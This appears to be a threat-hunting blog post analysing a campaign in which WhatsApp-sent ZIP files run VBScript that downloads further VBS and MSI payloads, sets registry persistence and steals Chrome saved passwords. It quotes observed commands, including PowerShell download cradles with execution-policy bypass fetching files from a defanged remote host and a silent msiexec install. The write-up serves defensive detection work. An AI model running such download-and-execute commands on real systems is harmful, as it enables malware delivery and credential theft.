Security Forem

Puneet Jena
Puneet Jena

Posted on

voltaj

While hunting for suspicious PowerShell commands and scripting interpreter activity, we identified evidence of multi-stage malicious execution involving VBS and PowerShell download cradles, MSI installation, and credential-stealing behavior.

Initial Access & Delivery Chain Summary

  • Threat actors leveraged WhatsApp as the initial access channel, sending messages to multiple employees within the organization to build trust before sharing a malicious ZIP file. Since ZIP files cannot be opened on mobile devices, users were compelled to access the archive on their endpoints, where they were deceived into executing an embedded VBScript payload.
  • Execution of the VBScript initiated a multi-stage payload delivery mechanism, where it:
  • Downloaded a secondary VBScript and an MSI installer from a remote C2 server (varegjopeaks[.]com) and saved them to the temporary directory.
  • Executed the MSI file silently via msiexec.exe, which dropped an additional VBS script named “installer”.
  • Created persistence by adding the installer script to the Run registry key.
  • Downloaded a specific Python environment and executed a PowerShell script that profiled the installed Chrome version and downloaded the official Chrome test automation driver.
  • Accessed and exfiltrated credentials stored in the Chrome password vault, continuously harvesting newly saved passwords due to the established persistence.

Observed Malicious Execution Activity

WScript Executions

  • "wscript.exe" C:\Users*\AppData\Local\Temp\baixa_sscado.vbs
  • "WScript.exe" C:\Users*\AppData\Local\Temp**.zip.0e6*.vbs
  • "wscript.exe" C:\Users*\AppData\Local\Temp\installer.vbs

PowerShell Download Activity

  • "powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/baixa_sscado.vbs' -OutFile $env:TEMP\baixa_sscado.vbs -UseBasicParsing"
  • "powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/teste_obscado.vbs' -OutFile $env:TEMP\installer.vbs -UseBasicParsing"
  • "powershell.exe" -ep bypass -c "Invoke-WebRequest -Uri 'hxxps://varegjopeaks[.]com/altor/installer.msi' -OutFile $env:TEMP\installer.msi -UseBasicParsing"

Msiexec Execution

  • "msiexec.exe" /i C:\Users*\AppData\Local\Temp\installer.msi /quiet /norestart

Top comments (0)